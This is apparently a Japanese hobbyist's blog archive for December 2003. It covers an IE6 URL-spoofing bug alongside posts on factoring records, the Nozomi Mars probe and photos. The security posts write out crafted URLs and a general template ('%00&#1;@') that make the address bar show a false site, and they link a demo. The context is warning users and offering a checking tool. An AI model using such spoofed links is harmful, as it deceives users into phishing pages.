エンド・ユーザ向け ネットワーク・セキュリティ・ニュース (篠田さん)

833786 - Steps that you can take to help identify and to help protect yourself from deceptive (spoofed) Web sites (Microsoft Support、12 月 13 日) … 原文

Microsoft から「成りすましたウェブサイトに騙されない方法について」という記事が出ています。IE においてアドレスバー、ステータスバー、リンクのプロパティなどが偽装されている可能性があることについては直接言及せず、セキュリティ証明書を確認することを勧めているようです。最後のほうに「リンクについて少しでも気になる場合には…(中略)…あるいはリンクが正しいもの(legitimate)であることを確認してください」という記述がありますが、偽装されている可能性がある箇所を明記せずにどうやって確認しろと言うのでしょうか。リンクにポインタを重ねたときにステータスバーに表示されるアドレスやリンクのプロパティに表示されるアドレスが正しいことを「確認」して本物だと思い込んでしまう人が出てくることは容易に想像できますから、この部分はむしろ逆効果なのではないかとさえ思えてきます。

成りすましたウェブサイトに騙されない方法について (Microsoft Security、12 月 13 日)

Caution: Avoid getting tricked by spoof websites (Microsoft Security、12 月 12 日) … 原文

らくがき

| コメント(0)

IE6 の危険な不具合関連

| コメント(0)

関連リンク

MSIE:URI 偽装ができるバグ、の続報 (沙耶 16 歳さん)

SayaWiki - URI 偽装バグ (沙耶 16 歳さん)

【使い方】の最後の一文を修正しました。手の込んだ偽装工作をされると移動に失敗する可能性があるので、移動後に必ずアドレス確認を行ってください。

「このページのアドレスは偽装されている可能性があります。」というダイアログが出ないようにする偽装方法を発見された方は速やかにご連絡ください。

「アドレス確認」ボタン

| コメント(0)

現状では IE は危険すぎるので、少なくとも「IE6 の危険な不具合」が修正されるまでは IE を使って個人情報などを入力することは避けるべきです。

何らかの事情でやむを得ず IE で個人情報などを入力しなければならない場合にアドレスが偽装されたページに騙される危険を少しでも減らすために、アドレスバーの内容が本物かどうかを確認できる「アドレス確認」ボタンを作りました。表示されているページのアドレスの確認と、正しいアドレスのページへの移動に必要な手間を減らすことができます。

【お約束】

「アドレス確認」ボタンはアドレスバーの偽装を発見しやすくするためのものであって、偽装を阻止するものではありません。「アドレス確認」ボタンの動作に問題が発見された場合はできる限り速やかに修正します(修正できない場合は削除します)が、運用は各自の責任で行ってください。

IE6 の危険な不具合」以外の方法でアドレスを偽装する方法が存在した場合には効果がない可能性があります。

【動作環境】

IE5.5 以上。動作確認は Windows XP Home Edition SP1 + IE6 SP1 で行いました。

ボタンを使うときだけでもアクティブスクリプトを有効にする必要があります。

【インストール方法】

下の「アドレス確認」ボタンをドラッグして IE のツールバーの「リンク」の右側に放り込んでください。ツールバーに「リンク」が表示されていないときは「表示」→「ツールバー」→「リンク」のチェックを入れると表示されます。なお、「お気に入り」に放り込んでも動作します。

アドレス確認

ボタンを放り込むとき、「追加しようとしているリンクは、安全でない可能性があります。続行しますか ?」というセキュリティ警告ダイアログが出ます。「はい」をクリックして続行してください。

【使い方】

アドレスバーの内容が本物かどうか確認したいとき「アドレス確認」ボタンをクリックすると、表示されているページのアドレスを示したプロンプトが出ます。アドレスに問題がなければ(アドレスバーの内容と一致していれば)「キャンセル」をクリックしてください。プロンプトがアドレスバーを隠してしまっているときはプロンプトの位置をずらすことで確認できます。

アドレスバーの内容が偽装されている可能性があると、プロンプトが出る前に「このページのアドレスは偽装されている可能性があります。」というダイアログが表示されます。

アドレスに問題があるときは操作をやめて「誰がアドレスを偽装しようとしたのか」を確認するべきですが、プロンプトに正しいアドレス入力して操作を続行することもできます。不適切な部分を削除して「OK」をクリックすると正しいアドレスのページへ移動します。

移動に失敗することはないと思いますが可能性があるので、正しいアドレスのページへ移動した後は念のため必ず再び「アドレス確認」ボタンをクリックして正しいアドレスのページへ移動できたかどうか確認してください。

【アンインストール方法】

「アドレス確認」ボタンを右クリック→削除で削除できます。

IE6 の危険な不具合関連

| コメント(0)

上の解説を更新しました。

関連リンク

マイクロソフト Internet Explorer: アドレスバーに表示ページ以外の URL が表示されてしまう (危険度最大) (ネットワーク・セキュリティ・ニュース)(篠田さん)

Internet Explorer URL parsing vulnerability(bugtraq) (tessy の日記)(tessy さん)

tessy さんちを見て驚愕(%01で URL 表示欄を偽装する) (hoshikuzu|stardust の書斎)(hoshikuzu さん)

Internet Explorer URL parsing vulnerability exploit (ヒビノキロク)(nozom さん)

IE に URL を偽装できるパッチ未公開の脆弱性が発見される (セキュリティホール memo)(小島さん)

追記

「ハイパーリンク上で右クリック→ショートカットのコピーを行ってからアドレスバーに貼り付ける」という手法でアドレスの異常を発見することができます。ただし、偽装の有無に関わらず貼り付けた後にリターンキーを押せば普通に左クリックした場合と同じ結果になってしまうので、アドレスの異常を見逃しがちなインターネット初心者がこの手法を機械的に覚えることはお勧めできません。

IE6 の危険な不具合関連

| コメント(0)

IE にサイトの偽装許すバグ?MS が調査中 (ZDNet エンタープライズ、12 月 11 日)

追加

IE に URL を偽装できるパッチ未公開の脆弱性が発見される (impress INTERNET Watch、12 月 11 日)

Internet Explorer にオンライン詐欺を助長する新たな欠陥 (CNET Japan、12 月 11 日)

IE に新たなバグ -- 偽サイトが本物に見える恐れあり (CNET Japan、12 月 11 日)

修正プログラムが公開されるよりも前に不具合の情報が Bugtraq に流れたことについて Microsoft が苦言を呈するのはもっともですが、不具合の存在をハッカーが知っていて一般ユーザがほとんど知らないという状態になることが最も危険なのですから、既に公開されてしまった情報については速やかにより多くのユーザに伝えて注意を促すことが必要だと思います。

今の時点でわかっていることの大雑把な解説です。用語はてきとうです。

IE のアドレスバーに表示されるアドレスは通常、

http:// サーバ名 [: ポート番号][/ フォルダ名][/ ファイル名]

のような構成になっていますが、認証が必要なサーバに自動でログオンしたいとき次のような書き方ができます。

http://[ユーザ名 [: パスワード]@] サーバ名 [: ポート番号][/ フォルダ名][/ ファイル名]

たとえば、本来のアドレスを「http://homepage2.nifty.com/m_kamada/」として、ユーザ名に「user」を指定するとき、アドレスは次のようになります。

http://user@homepage2.nifty.com/m_kamada/

ここで、ユーザ名の末尾に「&#1;」(コード 1 の文字)を挟むと、IE6 はなぜかアドレスバーに「@」以降を表示しなくなり、アドレスバーの内容が「http://user」になってしまいます。

http://user&#1;@homepage2.nifty.com/m_kamada/

ところで、ユーザ名のところに実在するサーバ名を記入したらどうなるでしょうか。実在するサーバ名であろうとなかろうと「@」の手前はユーザ名として解釈されるので、例えばユーザ名が「www.google.co.jp」ならばアドレスバーの内容が「http://www.google.co.jp」になってしまいます。この結果、アドレスバーの内容と実際に開いているページが異なる(ように見える)状態ができます。

http://www.google.co.jp&#1;@homepage2.nifty.com/m_kamada/

さらに、「%00」も併用するとステータスバーやプロパティにも本来のアドレスが表示されなくなり、本物とほとんど見分けがつかなくなってしまいます。

http://www.google.co.jp%00&#1;@homepage2.nifty.com/m_kamada/

追記

「%2f」を使うとフォルダ名も偽装できます。同時にスクリプトを使ってステータスバーの表示を偽装することで、アクティブスクリプトが有効なときステータスバーとアドレスバーの表示の末尾の「/」の有無が異なる不自然さも隠すことができます(アクティブスクリプトが無効でもステータスバーの表示の末尾の「/」が欠落するだけで動作します)。これでもしも表示されるページが本物そっくりあれば、偽物であることに気付く人は少ないと思います。

http://www.google.com/intl/ja/

まとめ

IE が開くアドレスについて、

(1) ステータスバーやプロパティでは "%xx" がデコードされるので文字列の末尾を意味する "%00" 以降が表示されない。

(2) アドレスバーには "\x01" 以降が表示されない。

(3) ユーザ名の指定に対応しているので実際に開くアドレスは "@" 以降。

などの条件から、

"http://[偽装アドレス]%00&#1;@[実際に開くアドレス]"

で本物とほとんど見分けのつかないトラップを作ることができる。

いわゆるセキュリティホールとは異なるが、かなり危険。

IE6 の危険な不具合関連

| コメント(0)

IE6 の危険な不具合について。

実験を更新しました。

対策 (2) では本物と見分けがつかないようにする方法が存在したため、対策 (2) を削除しました。

対策 (1) に重要な注意事項を追記しました。

IE6 の危険な不具合(更新 #2)

| コメント(0)

IE6 には「実際に開くページのアドレスと異なるアドレスをアドレスバーに表示させることができる」という不具合があり、その方法が公表されています。PC への侵入を許すセキュリティホールとは異なりますが、アドレスバーの内容を詐称することで訪問者を騙して個人情報などを盗む手口が考えられるので要注意です。

実験

下のハイパーリンクは「http://homepage2.nifty.com/m_kamada/」(STUDIO KAMADA)を開きながらアドレスバーに「http://www.google.co.jp/」(Google)を表示しようとします。

Google?

結果

Windows XP Home Edition SP1 + IE6 SP1(MS03-051 までの「重要な更新」をすべて適用済み)

Windows 98 Second Edition + IE6 SP1(MS03-051 までの「重要な更新」をすべて適用済み)

… アドレスバーの内容と実際に表示されるページが異なる。

対策

(0) 修正されるまで IE を使わない。

または

(1) IE で個人情報などを入力するとき、既に目的のページが表示されているように見えるときは一旦 IE を閉じて別のページを表示してから、目的のページのアドレスをアドレスバーに手動で入力して開く。既に偽のページが表示されている状態でアドレスバーの内容を手動で入力しなおしてリターンキーを押しても正しいページに移らない場合がある。

または

(2) IE で個人情報などを入力するとき、「ファイル」→「プロパティ」の「アドレス(URL)」にアドレスバーの内容と異なる文字(ゴミ)が表示されていないか慎重に確認する。

参考

エンド・ユーザ向け ネットワーク・セキュリティ・ニュース (篠田さん)

Internet Explorer URL parsing vulnerability (Bugtraq、12 月 9 日)

2004 年 2 月 3 日追記

MS04-004で修正されました。

RSA-576

| コメント(0)

174 桁の合成数 RSA-576 が GNFS で 87 桁の素数 2 個の積に素因数分解されたとの情報。

RSA-576 =

188198812920607963838697239461650439807163563379417382700763356422988859715234665485319060606504743045317388011303396716199692321205734031879550656996221305168759307650257059<174> =

398075086424064937397125500550386491199064362342526708406385189575946388957261768583317<87> *

472772146107435302536223071973048224632914695302097116459852171130520711256363590397527<87>

Factorization Announcements (CryptoWorld)

http://www.crypto-world.com/announcements/rsa576.txt

The RSA Challenge Numbers (RSA Laboratories)

http://www.rsasecurity.com/rsalabs/challenges/factoring/RSA-576.txt

火星探査機「のぞみ」

| コメント(0)

9 日夜、JAXA は火星探査機「のぞみ」の不具合箇所が復旧しなかったため、「のぞみ」の火星周回軌道投入を断念し、近火点の高度を上げるための軌道変更を行ったことを発表しました。目的地を目前にしていただけにとても残念ですが、「望み」を捨てずに数々の試練を乗り越えてきた経験はきっと次のミッションで役立てられることでしょう。最後まで復旧のための努力を続けた関係者の方々に「お疲れ様でした」と言いたいです。

宇宙科学研究本部 (JAXA)

火星探査機「のぞみ」最新情報 (12 月 9 日)

惑星探査機「のぞみ」、火星周回軌道への投入断念 (asahi.com サイエンス、12 月 9 日)

惑星探査機: 「のぞみ」を正式に断念 宇宙航空研究開発機構 (Mainichi INTERACTIVE 社会、12 月 10 日)

Japanese fail to salvage Mars mission (CNN.com Science&Space、12 月 9 日)→@nifty 翻訳

追記

火星探査機「のぞみ」の火星周回軌道への投入断念について (JAXA、12 月 10 日)

火星探査機「のぞみ」関連

| コメント(0)

きょう 9 日が火星探査機「のぞみ」の火星周回軌道投入のタイムリミットとされています。きょうまでに通信系・熱制御系機能が復旧しなかった場合、「のぞみ」は火星を通り過ぎて太陽を回り続けることになります。その際、近火点の高度を上げるために軌道変更が行われます。

宇宙科学研究本部 (JAXA)

火星探査機「のぞみ」最新情報 (12 月 9 日)

星が好きな人のための新着情報 (Naohito Fukuhara さん)

サンタバスター!

| コメント(0)

久しぶりのスクリーンショットは季節物ということで月刊電脳倶楽部 115 号(1997 年 12 月号)より『サンタバスター!』です。市販のゲームもいくつか試してみたのですが、半分くらいが「とりあえず操作して遊べる」という状況です。音がまともに出るようになったら公開しようと思っていたのですが、煮詰まってしまったので、先に操作パネルを作っているところです。

夕暮れ

| コメント(0)

水の絨毯、雲の天井、消え行く夕日、そびえる富士山。

撮影日:きょう。撮影時刻:16 時 30 分頃。ロケ地:狭山湖(埼玉県所沢市;富士山までの距離はおよそ 80km)。

2003 XJ7

| コメント(0)

きょう地球に最接近する小惑星。地球からの距離は 0.001AU(およそ 15 万 km、月までの距離の半分以下)。

Asteroid (2003 XJ7) (NASA JPL NEO) … 軌道シミュレーション(Java)

メモ

| コメント(0)

Microsoft が FAT ファイルシステム についてロイヤリティを徴収するという話。Human68k で採用されている FAT12 や FAT16VFAT 方式の拡張を伴わない場合については既に特許の有効期限を過ぎているのではないかという意見もあるが、Microsoft のサイトにはそういった区別は明記されていない。

FAT File System Technology and Patent License (Microsoft、12 月 3 日)

FAT File System: The Story Behind the Innovation (Microsoft、12 月 3 日)

Microsoft、技術ライセンスでオープン路線推進 (ZDNN、12 月 4 日)

MS がライセンスする「ClearType」と「FAT」とは? (ZDNN、12 月 4 日)

FAT ファイルシステムに特許料 (スラッシュドット ジャパン、12 月 4 日)

Opera 7.23(日本語版)

| コメント(0)

セキュリティアップデート。

OPERA 7.23 for Windows (日本語版) (OPERA 日本語サイト)

OPERA 7.23 for Linux (日本語版) (OPERA 日本語サイト)

素因数分解

| コメント(0)

数列 (19·10n-1)/9 = { 21, 211, 2111, 21111, 211111, ... } の素因数分解表を n≤150 まで伸ばしました。未分解の数が 16 個残っています。

Factorizations of near-repdigit numbers

知られている最大の素数関連

| コメント(0)

#1000

| コメント(0)

@nifty が ココログ というサービスを無料で始めたので X68000 Emulator in Java 開発メモのページを作ってみるテスト。

2^757-1 の素因数分解

| コメント(0)

知られている 40 番目のメルセンヌ素数の値が公表されたのと同じ日、メルセンヌ数 M757 = 2757-1 の素因数分解の結果が公表されました。残されていた 213 桁の合成数は 79 桁の素数と 134 桁の素数の積に分解されました。

2757-1 = 9815263 · 561595591 · c213

c213 = p79 · p134

p79 = 5722137022002067824248227975095857749151312827809388406962346253182128916964593

p134 = 24033821640983508088736273403005965446689002356344332130565066643193813901119771090424269412054543072714914742665677774247325292327559

NFSNET

Factors of 2^757-1 (NFSNET、12 月 2 日)

関連

The Cunningham Project (Sam Wagstaff)

知られている最大の素数

| コメント(0)

11 月 18 日の日記に書いた、11 月 17 日に発見された知られている 40 番目のメルセンヌ素数の値が公表されました。値は M20996011 = 220996011-1 で、10 進数で書くと 12597689545033010502…で始まる 6320430 桁の数です。2001 年 11 月 16 日の日記以降に書いた知られている 39 番目のメルセンヌ素数 M13466917 = 213466917-1(4053946 桁)の発見からおよそ 2 年で、知られている最大の素数の桁数が 200 万桁以上伸びたことになります。

Mersenne Prime Search (GIMPS)

40th Mersenne Prime Discovered@nifty 翻訳

The Largest Known Primes (Chris K. Caldwell さん)

40th Mersenne Prime Announced (MathWorld News、12 月 2 日)→@nifty 翻訳

Cooperative computing finds top prime number (ZDNet News、12 月 2 日)→ @nifty 翻訳

40th Mersenne Prime confirmation proves power of P2P (the INQUIRER、12 月 2 日)→ @nifty 翻訳

This number can't be left at the tone (The Washington Times、12 月 2 日)→@nifty 翻訳

Largest prime number ever is found (New Scientist、12 月 3 日)→@nifty 翻訳

月齢 8

| コメント(0)

撮影日:きょう。撮影時刻:17 時 50 分頃。ロケ地:自宅(東京都東村山市)。

メモ

| コメント(0)

Zetwork-Projects さん、サイトリニューアル。(旧サークル名:Zetwork-Clients)

このアーカイブについて

このページには、2003年12月に書かれた記事が新しい順に公開されています。

前のアーカイブは2003年11月です。

次のアーカイブは2004年1月です。

最近のコンテンツはインデックスページで見られます。過去に書かれたものはアーカイブのページで見られます。

月別 アーカイブ

ウェブページ

Powered by Movable Type 6.3.3